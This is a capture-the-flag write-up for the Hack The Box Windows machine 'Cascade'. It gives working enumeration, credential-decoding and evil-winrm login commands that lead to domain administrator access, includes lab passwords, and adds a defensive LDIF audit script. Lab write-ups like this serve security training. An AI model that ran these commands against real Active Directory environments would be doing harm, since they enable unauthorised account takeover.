Cascade HTB

Hello,

This is my write-up for the Cascade box, which was a Windows box. I had some difficulties with it since I am not that good with Windows, but I learned new things. Let's dive into it.

First of all, I scan for open ports with the following nmap command.

nmap -sC -sV -oA initial -Pn 10.10.10.182

I get the following result:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-04-01T15:36:03
|_  start_date: 2020-04-01T14:37:26

We have a few services related to Active Directory, such as Kerberos, LDAP and SMB. First I will use enum4linux to get possible usernames and groups, information that is accessible from LDAP.

enum4linux -a 10.10.10.182

Users:
Group 'Domain Users' (RID: 513) has member: CASCADE\administrator
Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc
Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith
Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
Group 'Domain Users' (RID: 513) has member: CASCADE\util
Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman
Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen
Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft

Groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]

I now have a list of usernames and a list of groups. I try a null (empty-password) authentication against SMB on port 445 with each of these usernames, but none of them work. At this point I install and open a GUI tool called JXplorer, which makes it easy to browse LDAP. I enter the host IP and then look for interesting information in the user attributes.

[screenshot: r_thompson_password_base64]

User r.thompson has an attribute named CascadeLegacyPwd, and I can tell it is base64 because of the trailing = padding. Decoding it gives me the password for that user.

echo -n "clk0bjVldmE=" | base64 -d
rY4n5eva

Let's use smbclient with the username and password we have to test whether we can log in to SMB.

smbclient -L //10.10.10.182 -U r.thompson
Enter WORKGROUP\r.thompson's password: rY4n5eva

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I try to access Audit$ but I don't have permission, so I try Data instead:

kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Audit$ -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient  //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797938 blocks available
smb: \> 

I was able to download these files from the share.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls
 ArkAdRecycleBin.log   dcdiag.log   Meeting_Notes_June_2018.html  'VNC Install.reg'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ 

The file ArkAdRecycleBin.log contains logs from a program called Ark AD Recycle Bin.

[screenshot: ark]

If you look closely you can see two objects being deleted, and the command is running as user ArkSvc. Maybe we can restore these objects?

The file dcdiag.log contains:

[screenshot: dcdiag]

As the header says, this is output from a domain controller diagnostic. There was nothing I could take as useful information from this file.

The next file is Meeting_Notes_June_2018.html:

[screenshot: meeting_notes]

From this file I get the following info:

If you look at the ArkAdRecycleBin log, we can see that user TempAdmin gets deleted, and the date is 8/12/2018, which is the day after Wednesday. We keep this in mind.

The last file is VNC Install.reg:

[screenshot: vnc_log]

As the file extension says, this is an export from the registry. It contains a Password value stored in hex. I search around and find a tool that can decode the VNC password for me: vncpasswd.py.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
Cloning into 'vncpasswd.py'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (22/22), done.
remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261
Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done.
Resolving deltas: 100% (144/144), done.
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f"
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ 

And I get the password sT333ve2. At this point I run nmap again to check whether WinRM is open.

kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT
Nmap scan report for 10.10.10.182
Host is up (0.069s latency).

PORT     STATE    SERVICE
5985/tcp open     wsman
5986/tcp filtered wsmans

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
kali@kali:~$ 

I first try the user s.smith (name taken from the enum4linux output), as this user was also mentioned in the Meeting_Notes_June_2018.html file.

kali@kali:~$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith

I am logged in as s.smith now and can read the user.txt file. After poking around the box I can't find much, so I go back and check whether I can access the SMB shares with the credentials of the new user.

smbclient  //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796325 blocks available
smb: \> 

I can access Audit$, which contains an .exe, a .dll that seems to be linked to it, a DB folder and some other .dll files. Inside DB there is a file named Audit.db.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db 
Audit.db: SQLite 3.x database, last written using SQLite version  

I open the file with SQLite database browser. Inside the Ldap table I find a base64 string. I try to decode it, but get nothing readable. It seems to belong to a user named ArkSvc, who is probably related to ArkAdRecycleBin as seen in the log.

[screenshot: arksvc]

Looking into RunAudit.bat, I see that it invokes the executable.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ cat RunAudit.bat 
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

Maybe the password is encrypted by the exe file we saw earlier. I am going to use AvaloniaILSpy (you can also use dotPeek if you feel like switching to a Windows box). I open the executable and look for the Main function, because this is where every program starts. In the main program I find some juicy stuff:

[screenshot: ILSPY]

There is a decryption process happening: password = Crypto.DecryptString(encryptedString, "c4scadek3y654321"); so I also have a key string. Now I load the DLL as well, since Crypto.DecryptString may be referring to it, and inside the DLL I find the decryption function:

[screenshot: decryption_function]

There is also an IV, and the decryption algorithm seems to be AES in CBC mode.

I now have the following extracted:

Using this website, I get the decrypted password, which is itself base64 encoded.

kali@kali:~$ echo -n "dzNsYzBtZUZyMzFuZA==" | base64 -d
w3lc0meFr31nd

I now log in with evil-winrm as user ArkSvc with password w3lc0meFr31nd. As the file ArkAdRecycleBin.log shows, I will try to restore the deleted accounts, because they should be in the recycle bin, right?

I see the deleted objects:

get-adobject -filter 'objectclass -eq "user" -AND IsDeleted -eq $True' -IncludeDeletedObjects -properties IsDeleted,LastKnownParent | Format-List Name,IsDeleted,LastKnownParent,DistinguishedName

[screenshot: deleted_object]

But trying to restore it fails, as I don't have the rights to do so.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:80
+ ... ccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
*Evil-WinRM* PS C:\Users\arksvc\Documents> 

After a while, I try to view the properties of this object, which may reveal the password just as they did for the r.thompson user.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Indeed it reveals the password:

cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz

which, base64 decoded, gives me the cleartext password:

baCT3r1aN00dles
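The r.thompson and TempAdmin findings above are the same weakness seen twice: a cleartext password base64-encoded into a custom attribute, surviving even on a deleted object. As an added audit example (my code, not part of the original write-up), the script below parses a constructed LDIF export in the shape ldapsearch produces, flags attribute values that are base64-encoded short printable text, and scans deleted objects too, because an enabled AD Recycle Bin keeps every attribute of a deleted account until the tombstone lifetime expires.

```python
import base64
import re

# Constructed LDIF export (ldapsearch shape) carrying the two cascadeLegacyPwd values shown on the page.
SAMPLE_LDIF = """\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
description: IT staff
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=TempAdmin\\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
objectClass: user
sAMAccountName: TempAdmin
isDeleted: TRUE
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
"""

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_ldif(text):
    """Minimal LDIF parser: joins folded lines (leading space) and decodes
    '::' values, which LDIF itself base64-encodes for non-ASCII data."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value.strip())
    return entries


def looks_like_encoded_secret(value):
    """Well-formed base64 that decodes to short printable ASCII: the signature
    of a password 'hidden' in a custom attribute instead of being hashed."""
    if len(value) % 4 or not B64_RE.match(value):
        return False
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return 0 < len(decoded) <= 64 and decoded.isprintable()


def find_encoded_secrets(ldif_text):
    """Return (sAMAccountName, attribute, is_deleted, decoded_length) per hit.
    The cleartext is deliberately not returned; the length is enough to triage,
    and deleted objects are included because the Recycle Bin keeps their attributes."""
    findings = []
    for entry in parse_ldif(ldif_text):
        name = entry.get("sAMAccountName", entry["dn"])[0]
        deleted = entry.get("isDeleted", ["FALSE"])[0].upper() == "TRUE"
        for attr, values in entry.items():
            if attr in ("dn", "objectClass", "sAMAccountName"):
                continue
            for value in values:
                if looks_like_encoded_secret(value):
                    findings.append((name, attr, deleted, len(base64.b64decode(value))))
    return findings
```

Run find_encoded_secrets() over a real export (ldapsearch with the deleted-objects control, or a Get-ADObject -IncludeDeletedObjects dump converted to LDIF) to list every object that still carries such an attribute.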

I now use evil-winrm again, but this time as user Administrator (because, as seen in Meeting_Notes_June_2018.html, TempAdmin has the same password as the admin).

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

I can obtain root.txt now.

Extra

Trying to log in as TempAdmin does nothing, as this user is deleted. I restore the object as Administrator with the command Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject and then try to log in, but I still can't. Looking at the groups TempAdmin belongs to, the user is not in Remote Management Users. After adding the user to that group I can log in as TempAdmin as well.

kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin
User name                    TempAdmin
Full Name                    TempAdmin
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            27/01/2020 04:23:08
Password expires             Never
Password changeable          27/01/2020 04:23:08
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Documents> Add-LocalGroupMember -Group "Remote Management Users" -Member "TempAdmin"
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ evil-winrm -i 10.10.10.182 -u TempAdmin -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TempAdmin\Documents> whoami
cascade\tempadmin

Here are some useful links I used while doing this box: Active-directory-recycle-bin

The quieter you become, the more you are able to hear.